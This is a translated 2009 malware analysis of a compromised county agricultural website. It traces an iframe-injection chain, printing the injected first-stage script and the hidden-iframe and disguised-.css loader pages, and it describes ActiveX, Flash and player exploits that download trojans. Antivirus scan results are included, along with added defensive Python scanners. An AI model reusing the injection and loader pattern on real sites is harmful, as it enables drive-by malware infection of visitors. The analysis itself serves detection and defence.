A county agricultural website compromised to serve malware: Trojan.Win32.KillAV.bca / Trojan-Downloader.Win32.Geral.ix

Original by endurer
2009-05-05, version 1

On opening the county agricultural website, Maxthon prompted to install an ActiveX control.

Checking the page source, I found:
/---
<script src=hxxp://***.w**vg0**.cn></script>
---/


#1 hxxp://***.w**vg0**.cn contains the code:
/---
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>")
document.write("</div>")}
---/

Its function: check the current URL; if it contains the string "gov", do nothing; otherwise output the code:
/---
<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>
---/


#1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index.htm contains the code:
/---
<iframe src=index2.htm width=100 height=0></Iframe>
---/

#1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index2.htm contains the code:
/---
<iframe src=ccqm.htm width=100 height=0></iframe>
<script src="js.css"></script>

---/


#1.1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/ccqm.htm

Exploits a vulnerability in the control with clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365 to download hxxp://w*w1.u**ws**3y.com/**1/ActivcX.exe


File: D:/test/ActivcX.exe
Attributes: A---
Digital signature: Microsoft Windows
PE file: yes
Language: Chinese (China)
File version: 1, 0, 0, 1
Copyright: Copyright © 2008
Product version: 1, 0, 0, 1
Created: 2009-5-5 9:33:34
Modified: 2009-5-5 9:33:34
Size: 43016 bytes 42.8 KB
MD5: 614a7b4f6c23783d463c681e46a5735f
SHA1: DD8BB584C4D4915993E57E69A8F8C0E0DABDC59E
CRC32: 3371c540

File ActivcX.exe received on 2009.05.05 03:35:13 (CET)

Antivirus engine Version Last updated Result
a-squared 4.0.0.101 2009.05.05 Trojan.Win32.AntiAV!IK
AhnLab-V3 5.0.0.2 2009.05.04 -
AntiVir 7.9.0.160 2009.05.04 TR/Killav.PN
Antiy-AVL 2.0.3.1 2009.04.30 -
Authentium 5.1.2.4 2009.05.04 -
Avast 4.8.1335.0 2009.05.04 Win32:Rootkit-gen
AVG 8.5.0.327 2009.05.04 -
BitDefender 7.2 2009.05.04 -
CAT-QuickHeal 10.00 2009.05.04 -
ClamAV 0.94.1 2009.05.04 -
Comodo 1149 2009.05.03 -
DrWeb 4.44.0.09170 2009.05.05 -
eSafe 7.0.17.0 2009.05.03 Suspicious File
eTrust-Vet 31.6.6489 2009.05.05 Win32/Dogrobot.V
F-Prot 4.4.4.56 2009.05.04 -
F-Secure 8.0.14470.0 2009.05.04 -
Fortinet 3.117.0.0 2009.05.04 -
GData 19 2009.05.05 -
Ikarus T3.1.1.49.0 2009.05.05 Trojan.Win32.AntiAV
K7AntiVirus 7.10.723 2009.05.04 -
Kaspersky 7.0.0.125 2009.05.05 -
McAfee 5605 2009.05.04 -
McAfee+Artemis 5605 2009.05.04 -
McAfee-GW-Edition 6.7.6 2009.05.04 Trojan.Killav.PN
Microsoft 1.4602 2009.05.04 Trojan:Win32/Dogrobot.I
NOD32 4052 2009.05.04 a variant of Win32/AntiAV.NAC
Norman 6.01.05 2009.05.04 -
nProtect 2009.1.8.0 2009.05.04 -
Panda 10.0.0.14 2009.05.04 -
PCTools 4.4.2.0 2009.05.03 -
Prevx1 3.0 2009.05.05 -
Rising 21.28.04.00 2009.05.04 -
Sophos 4.41.0 2009.05.05 -
Sunbelt 3.2.1858.2 2009.05.04 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.05 Downloader
TheHacker 6.3.4.1.318 2009.05.04 -
TrendMicro 8.950.0.1092 2009.05.04 Possible_Mlwr-13
VBA32 3.12.10.4 2009.05.04 suspected of Win32.BrokenEmbeddedSignature (paranoid heuristics)
ViRobot 2009.5.4.1719 2009.05.04 -
VirusBuster 4.6.5.0 2009.05.04 -
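To make a scan table like the one above machine-readable (how many engines flag the file, how many of those verdicts are heuristic rather than named signatures, and which family names the engines agree on), here is an added Python example that is not from the original post. The sample rows are a subset of the ActivcX.exe table above; the keywords used to classify a verdict as heuristic and the tokens filtered out of family names are my own assumptions.

```python
import re
from collections import Counter

# One row per engine: "<engine> <version> <yyyy.mm.dd> <result>"; a result of "-"
# or an empty result means the engine did not flag the file.
ROW = re.compile(
    r"^(?P<engine>\S+)\s+(?P<version>\S+)\s+(?P<updated>\d{4}\.\d{2}\.\d{2})\s*(?P<result>.*)$"
)

# Assumed markers of a heuristic/generic verdict rather than a named signature.
HEURISTIC_MARKERS = ("heur", "suspect", "suspicious", "behaves", "possible", "paranoid")
# Generic tokens that say nothing about the family.
NOISE_TOKENS = {"trojan", "win32", "variant", "downloader"}


def parse_scan_table(text):
    """Parse engine rows into dicts; header and 'file received' lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        result = m.group("result").strip()
        detected = result not in ("", "-")
        rows.append({
            "engine": m.group("engine"),
            "version": m.group("version"),
            "updated": m.group("updated"),
            "result": result if detected else None,
            "detected": detected,
            "heuristic": detected and any(k in result.lower() for k in HEURISTIC_MARKERS),
        })
    return rows


def summarize(rows):
    """Detection counts plus the family tokens (KillAV, AntiAV, Dogrobot ...) named by signature verdicts."""
    detected = [r for r in rows if r["detected"]]
    heuristic = [r for r in detected if r["heuristic"]]
    families = Counter()
    for r in detected:
        if r["heuristic"]:
            continue
        # Alphabetic runs of 4+ letters in the verdict string, minus generic tokens.
        for tok in re.findall(r"[A-Za-z]{4,}", r["result"]):
            if tok.lower() not in NOISE_TOKENS:
                families[tok.lower()] += 1
    return {
        "total": len(rows),
        "detected": len(detected),
        "signature": len(detected) - len(heuristic),
        "heuristic": len(heuristic),
        "families": families.most_common(),
    }


# Sample: a subset of the ActivcX.exe rows above, including the header line and a
# row with an empty result (as the VirusBuster row of the cX.exe table has).
SCAN_SAMPLE = """Antivirus engine Version Last updated Result
a-squared 4.0.0.101 2009.05.05 Trojan.Win32.AntiAV!IK
AhnLab-V3 5.0.0.2 2009.05.04 -
AntiVir 7.9.0.160 2009.05.04 TR/Killav.PN
Avast 4.8.1335.0 2009.05.04 Win32:Rootkit-gen
Kaspersky 7.0.0.125 2009.05.05 -
Microsoft 1.4602 2009.05.04 Trojan:Win32/Dogrobot.I
NOD32 4052 2009.05.04 a variant of Win32/AntiAV.NAC
Rising 21.28.04.00 2009.05.04 -
VBA32 3.12.10.4 2009.05.04 suspected of Win32.BrokenEmbeddedSignature (paranoid heuristics)
VirusBuster 4.6.5.0 2009.05.04
"""

if __name__ == "__main__":
    report = summarize(parse_scan_table(SCAN_SAMPLE))
    print(f"{report['detected']}/{report['total']} engines flag the file "
          f"({report['signature']} named, {report['heuristic']} heuristic)")
    print("family tokens:", report["families"])
```

The family tally is deliberately crude: it only shows where vendors overlap (here KillAV/AntiAV, which is what Rising and Kaspersky later confirmed), not which name is "right".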


Additional information
File size: 43016 bytes
MD5...: 614a7b4f6c23783d463c681e46a5735f
SHA1..: dd8bb584c4d4915993e57e69a8f8c0e0dabdc59e
SHA256: 5860dca29a93c9d639822cdc94c63cf885e15ff211cd750d279a1fa1af9bacd1
SHA512: a74c18c29e0b8be5dc22c50858ec3fcfdcad1d9d4f6563975671469e0cb63347
728addda34e40460edc3af512e800e0725b0b47a8d200b5c6d9e439f7032d286
ssdeep: 768:CpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3ACmw0PWa:ARh
uXnlcqMa9Vwlbkf9n4l0bj3ACml
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1b1b0
timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036
.rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0

( 2 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> USER32.dll: wsprintfA

( 0 exports )
PDFiD.: -
RDS...: NSRL Reference Data Set
-
packers (Kaspersky): PE_Patch.UPX, UPX
packers (Avast): UPX
packers (F-Prot): UPX
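The PE details above are the classic signs of a packed executable: UPX section names, a UPX0 section with a 0x11000-byte virtual size but no raw data (the area the stub unpacks into), a UPX1 section with entropy 7.91, and an import table of only seven functions that includes LoadLibraryA and GetProcAddress for run-time resolution. The cX.exe report further down shows the same section table, entry point and section hashes. The following is an added Python example, not from the original post, that parses that section listing and runs the entropy and packing heuristics an analyst would apply; the entropy threshold of 7.0 and the import-count threshold of 8 are my own assumptions.

```python
import math
import re


def shannon_entropy(data):
    """Bits per byte (0.0 .. 8.0) of a byte string; packed or encrypted data sits near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Row format as printed in the report: "name viradd virsiz rawdsiz ntrpy md5".
SECTION_ROW = re.compile(
    r"^(?P<name>\S+)\s+(?P<viradd>0x[0-9a-f]+)\s+(?P<virsiz>0x[0-9a-f]+)\s+"
    r"(?P<rawdsiz>0x[0-9a-f]+)\s+(?P<ntrpy>\d+\.\d+)\s+(?P<md5>[0-9a-f]{32})$",
    re.I,
)


def parse_sections(text):
    """Parse section rows; the header row and other lines do not match and are skipped."""
    out = []
    for line in text.splitlines():
        m = SECTION_ROW.match(line.strip())
        if m:
            d = m.groupdict()
            out.append({
                "name": d["name"],
                "virsiz": int(d["virsiz"], 16),
                "rawdsiz": int(d["rawdsiz"], 16),
                "entropy": float(d["ntrpy"]),
                "md5": d["md5"],
            })
    return out


def packing_indicators(sections, imports, entropy_threshold=7.0, max_imports=8):
    """Return the list of reasons a sample looks packed; an empty list means nothing fired."""
    reasons = []
    for s in sections:
        if s["name"].upper().startswith("UPX"):
            reasons.append(f"section name {s['name']} is a UPX marker")
        if s["rawdsiz"] == 0 and s["virsiz"] > 0:
            reasons.append(f"{s['name']} has no raw data but {s['virsiz']:#x} bytes of virtual size (unpack target)")
        if s["entropy"] >= entropy_threshold:
            reasons.append(f"{s['name']} entropy {s['entropy']:.2f} is near the 8.0 maximum")
    names = {fn for fns in imports.values() for fn in fns}
    if len(names) <= max_imports and {"LoadLibraryA", "GetProcAddress"} <= names:
        reasons.append(f"only {len(names)} imports, with LoadLibraryA/GetProcAddress for run-time resolution")
    return reasons


# Section table and imports exactly as listed in the ActivcX.exe report above.
SECTION_TEXT = """name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036
.rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0
"""
IMPORTS = {
    "KERNEL32.DLL": ["LoadLibraryA", "GetProcAddress", "VirtualProtect",
                     "VirtualAlloc", "VirtualFree", "ExitProcess"],
    "USER32.dll": ["wsprintfA"],
}

if __name__ == "__main__":
    for reason in packing_indicators(parse_sections(SECTION_TEXT), IMPORTS):
        print("-", reason)
```

The entropy function is what produces the "ntrpy" column when run over each section's raw bytes; it is included so the 7.91 figure can be reproduced on a local copy of a sample.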

http://bbs.ikaka.com//showtopic-8621775.aspx

Reply: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f
Posted: 2009-05-05 10:19

File name: ActivcX.exe

Virus name: Trojan.Win32.KillAV.bca


The virus file you reported will be handled in Rising 2009 version 21.28.11; in special circumstances this may be postponed by a few versions.

Subject: RE: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f [KLAN-27689534]
From: newvirus@kaspersky.com
Date: 2009-5-5 10:42:38
Hello,

ActivcX.exe - Trojan-Downloader.Win32.Geral.ix

New malicious software was found in this file. Its detection will be included in the next update.

Thank you for your help.

-----------------

Regards, Vitaly Butuzov

Virus Analyst, Kaspersky Lab.

#1.1.1.2 hxxp://er**.d**ry*63.cn/1*/2**0/js.css

outputs the code:
/---
<iframe width=100 height=0 src=hk14.htm></iframe>
<iframe width=100 height=0 src=hkfl.htm></iframe>
<iframe width=100 height=0 src=hkvod.htm></iframe>
<iframe width=50 height=0 src=hkbb.htm></iframe>
<iframe src=hkxxz.htm width=100 height=0></iframe>
<iframe width=50 height=0 src=hkff.htm></iframe>
<iframe width=100 height=0 src=hk122121.htm></iframe>
---/
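The markers this chain relies on are visible in the page source at every stage: the first-stage script in #1 wraps a document.write iframe in a display:none div, and index2.htm (#1.1.1) and js.css (#1.1.1.2) use height=0 iframes and load scripts from files named .css. A site owner can scan their own pages for exactly those patterns. The following is an added Python example, not from the original post; the sample inputs are constructed to mirror index2.htm and the stage-1 script, with a placeholder host name.

```python
import re
from html.parser import HTMLParser

# Elements that never get a closing tag; they must not push onto the nesting stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta", "param", "source"}
# <script src=...> pointing at one of these is a script disguised as another file type (js.css, 14.css ...).
FAKE_SCRIPT_EXT = (".css", ".jpg", ".gif", ".png")
# The first-stage script on the page emits its frame with document.write("<iframe ...>").
DOCWRITE_IFRAME = re.compile(r"document\.write\s*\(\s*[\"'][^\"']*<iframe", re.I)


class InjectedFrameFinder(HTMLParser):
    """Collects (kind, src, reason) for frames hidden by display:none or sized to zero,
    and for script tags whose src has a non-script extension."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._hidden_stack = []  # one entry per open element: True if it is a display:none container

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hides = "display:none" in style
        if tag == "iframe":
            reasons = []
            if hides or any(self._hidden_stack):
                reasons.append("hidden by display:none")
            if a.get("height") in ("0", "0px") or a.get("width") in ("0", "0px"):
                reasons.append("zero-size frame")
            if reasons:
                self.findings.append(("iframe", a.get("src", ""), "; ".join(reasons)))
        elif tag == "script":
            src = a.get("src", "")
            if src.lower().split("?", 1)[0].endswith(FAKE_SCRIPT_EXT):
                self.findings.append(("script", src, "script loaded from a non-script file name"))
        if tag not in VOID_TAGS:
            self._hidden_stack.append(hides)

    def handle_endtag(self, tag):
        if self._hidden_stack:
            self._hidden_stack.pop()


def scan_html(text):
    """Return the findings for one page body (also works on stage-1 script text)."""
    finder = InjectedFrameFinder()
    finder.feed(text)
    finder.close()
    findings = list(finder.findings)
    for m in DOCWRITE_IFRAME.finditer(text):
        findings.append(("script-text", m.group(0), "iframe emitted via document.write"))
    return findings


# Constructed samples mirroring index2.htm and the stage-1 script above; the host is a placeholder.
SAMPLE_INDEX2 = '<iframe src=ccqm.htm width=100 height=0></Iframe>\n<script src="js.css"></script>\n'
SAMPLE_STAGE1 = (
    'if(document.location.href.indexOf("gov")>=0)\n'
    '{} else {document.write("<div style=\'display:none\'>")\n'
    'document.write("<iframe src=hxxp://stage2.example.invalid/index.htm></iframe>")\n'
    'document.write("</div>")}'
)

if __name__ == "__main__":
    for label, sample in (("index2.htm", SAMPLE_INDEX2), ("stage-1 script", SAMPLE_STAGE1)):
        for kind, src, reason in scan_html(sample):
            print(f"{label}: {kind} {src!r}: {reason}")
```

Because the parser is tolerant, unquoted attribute values and the mixed-case </Iframe> seen in the page are handled; an unclosed iframe (as in hkfl.htm) simply leaves an entry on the nesting stack.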

#1.1.1.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/hk14.htm contains the code:
/---
<script src=14.css></script>
<script src=15.css></script>
<script src=16.css></script>
---/
It also exploits the MS06-014 vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe, creating baidueee.vbs to run it.

2009-5-5 9:49:09 hxxp://w*w1.u**ws**3y.com/**1/cX.exe//#HttpRead 检测到威胁: Trojan-Downloader.Win32.Geral.if


File: D:/test/cX.exe
Attributes: A---
Digital signature: no
PE file: yes
Language: Chinese (China)
File version: 1, 0, 0, 1
Copyright: Copyright © 2008
Product version: 1, 0, 0, 1
Created: 2009-5-5 9:50:17
Modified: 2009-5-5 9:50:17
Size: 40448 bytes 39.512 KB
MD5: b1238d558b393d2688072a2400aedcc2
SHA1: E59D4779418EA92E208797518FC78DA8D996B692
CRC32: 8a02509a

File cX.exe received on 2009.05.05 03:50:43 (CET)

Antivirus engine Version Last updated Result
a-squared 4.0.0.101 2009.05.05 Trojan.Win32.AntiAV!IK
AhnLab-V3 5.0.0.2 2009.05.04 -
AntiVir 7.9.0.160 2009.05.04 TR/Killav.PN
Antiy-AVL 2.0.3.1 2009.04.30 -
Authentium 5.1.2.4 2009.05.04 -
Avast 4.8.1335.0 2009.05.04 Win32:Rootkit-gen
AVG 8.5.0.327 2009.05.04 -
BitDefender 7.2 2009.05.04 Gen:Trojan.Heur.2014755353
CAT-QuickHeal 10.00 2009.05.04 -
ClamAV 0.94.1 2009.05.04 -
Comodo 1149 2009.05.03 -
DrWeb 4.44.0.09170 2009.05.05 -
eSafe 7.0.17.0 2009.05.03 Suspicious File
eTrust-Vet 31.6.6489 2009.05.05 Win32/Dogrobot.V
F-Prot 4.4.4.56 2009.05.04 -
F-Secure 8.0.14470.0 2009.05.04 -
Fortinet 3.117.0.0 2009.05.04 -
GData 19 2009.05.05 Gen:Trojan.Heur.2014755353
Ikarus T3.1.1.49.0 2009.05.05 Trojan.Win32.AntiAV
K7AntiVirus 7.10.723 2009.05.04 -
Kaspersky 7.0.0.125 2009.05.05 -
McAfee 5605 2009.05.04 -
McAfee+Artemis 5605 2009.05.04 Artemis!B1238D558B39
McAfee-GW-Edition 6.7.6 2009.05.04 Trojan.Killav.PN
Microsoft 1.4602 2009.05.04 Trojan:Win32/Dogrobot.I
NOD32 4052 2009.05.04 a variant of Win32/AntiAV.NAC
Norman 6.01.05 2009.05.04 -
nProtect 2009.1.8.0 2009.05.04 -
Panda 10.0.0.14 2009.05.04 Suspicious file
PCTools 4.4.2.0 2009.05.03 -
Prevx1 3.0 2009.05.05 Medium Risk Malware
Rising 21.28.04.00 2009.05.04 -
Sophos 4.41.0 2009.05.05 Mal/PWS-Fam
Sunbelt 3.2.1858.2 2009.05.04 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.05 Downloader
TheHacker 6.3.4.1.318 2009.05.04 -
TrendMicro 8.950.0.1092 2009.05.04 Possible_Mlwr-13
VBA32 3.12.10.4 2009.05.04 -
ViRobot 2009.5.4.1719 2009.05.04 -
VirusBuster 4.6.5.0 2009.05.04

Additional information
File size: 40448 bytes
MD5...: b1238d558b393d2688072a2400aedcc2
SHA1..: e59d4779418ea92e208797518fc78da8d996b692
SHA256: bd7c58dd6fffc7c3e073e85e7ab1b0070d0976665df1e5c64d8307f8336b2867
SHA512: 460b6261f52d29793b9a47aa7c3bd88f32732716027d5ad48246a847875833f1
212aafba066a8325760a383304c3b52847dad6d18360333dfcc29484a2be7599
ssdeep: 768:ZpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3AC:vRhuXnlcq
Ma9Vwlbkf9n4l0bj3AC
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1b1b0
timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036
.rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0

( 2 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> USER32.dll: wsprintfA

( 0 exports )
PDFiD.: -
RDS...: NSRL Reference Data Set
-
packers (Kaspersky): PE_Patch.UPX, UPX
packers (Avast): UPX
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=4949059600D505AE9EA000B8E880E10042A80038
packers (F-Prot): UPX

http://bbs.ikaka.com//showtopic-8621768.aspx

Reply: cX.exe——b1238d558b393d2688072a2400aedcc2
Posted: 2009-05-05 14:21

File name: cX.exe

Virus name: Trojan.Win32.KillAV.bca


The virus file you reported will be handled in Rising 2009 version 21.28.11; in special circumstances this may be postponed by a few versions.

#1.1.1.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/hkfl.htm detects the browser type; if it is IE, it outputs:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/

If it is Firefox, it outputs:

/---
<iframe src=cc22.htm width=100% height=100% scrolling=no frameborder=0>
---/

Otherwise it outputs:

/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/

#1.1.1.2.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/cc11.htm
Exploits a Flash player plugin vulnerability to download ci115.swf, ci47.swf, ci45.swf, ci64.swf or ci28.swf.

#1.1.1.2.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/cc22.htm
Exploits a Flash player plugin vulnerability to download cf115.swf, cf47.swf, cf45.swf, cf64.swf or cf28.swf.

#1.1.1.2.3 hxxp://er**.d**ry*63.cn/1*/2**0/hkvod.htm includes the code:
/---
<script src="ccvod.css"></script>
<script src="b.css"></script>
<script src="d.css"></script>
---/
Exploits a QVOD player (clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe


#1.1.1.2.4 hxxp://er**.d**ry*63.cn/1*/2**0/hkbb.htm includes the code:
/---
<script src="bff1.css"></script>
<script src="bff.css"></script>
---/

Exploits a Baofeng Storm player (暴风影音, clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe


#1.1.1.2.5 hxxp://er**.d**ry*63.cn/1*/2**0/hkxxz.htm includes the code:
/---
<script src="091.css"></script>
<script src="092.css"></script>
---/
To be analysed.

#1.1.1.2.6 hxxp://er**.d**ry*63.cn/1*/2**0/hkff.htm includes:
/---
<script src="ff.css"></script>
---/
Exploits a Microsoft Access Snapshot Viewer (snpvw.Snapshot Viewer Control.1, clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe and save it as C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe (the All Users Start Menu/Programs/Startup folder).


#1.1.1.2.7 hxxp://er**.d**ry*63.cn/1*/2**0/hk122121.htm includes:
/---
<script src="Turl.css"></script>
<script src="real.css"></script>
<script src="real1.css"></script>
---/
Exploits a RealPlayer (clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe and save it as C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe (the All Users Start Menu/Programs/Startup folder).
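Every exploit page in this chain (ccqm.htm, hkvod.htm, hkbb.htm, hkff.htm, hk122121.htm) targets an ActiveX control by CLSID. That gives defenders two concrete handles: page content can be scanned for those CLSIDs, and on clients the Internet Explorer kill bit (Compatibility Flags 0x400 under the ActiveX Compatibility registry key) stops each control from being instantiated from a web page at all. The following is an added Python example, not from the original post; the CLSID labels repeat what the analysis above says about each control, and the sample HTML is constructed.

```python
import re

# CLSIDs named in the analysis above; labels follow the page, not a vendor database.
KNOWN_CLSIDS = {
    "19EFFC12-25FB-479A-A0F2-1569AE1B3365": "control abused by ccqm.htm (not named on the page)",
    "F3D0D36F-23F8-4682-A195-74C92B03D4AF": "QVOD player",
    "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB": "Baofeng Storm player",
    "F0E42D50-368C-11D0-AD81-00A0C90DC8D9": "Microsoft Access Snapshot Viewer (snpvw.Snapshot Viewer Control.1)",
    "CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA": "RealPlayer",
}

# Matches clsid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX in any case, with or without braces.
CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\}?", re.I
)


def find_clsids(text):
    """All CLSIDs referenced as clsid:... in page text, upper-cased, in first-seen order."""
    seen = []
    for m in CLSID_RE.finditer(text):
        c = m.group(1).upper()
        if c not in seen:
            seen.append(c)
    return seen


def match_known(clsids):
    """Subset of the found CLSIDs that appear in this chain, with their labels."""
    return {c: KNOWN_CLSIDS[c] for c in clsids if c in KNOWN_CLSIDS}


KILLBIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"


def killbit_reg(clsids):
    """Emit .reg text that sets the IE kill bit (Compatibility Flags = 0x400) for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for c in clsids:
        lines.append(f"[{KILLBIT_KEY}\\{{{c}}}]")
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\n".join(lines)


# Constructed sample page: two controls from the list above (one in lower case) and,
# as a control that is not on the list, the Shockwave Flash CLSID.
SAMPLE_HTML = """<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="snap"></object>
<object classid="clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa" id="rp"></object>
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"></object>
"""

if __name__ == "__main__":
    found = find_clsids(SAMPLE_HTML)
    for c, label in match_known(found).items():
        print(f"{c}: {label}")
    print(killbit_reg(match_known(found)))
```

Setting the kill bit is a client-side mitigation only; it does not remove the vulnerable software, and the key is per-machine, so it belongs in a GPO or build image rather than being applied by hand. The scanner side is just a CLSID match and will also fire on a vendor's own legitimate embed of the control, so findings need a look at the surrounding script before being treated as an infection.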
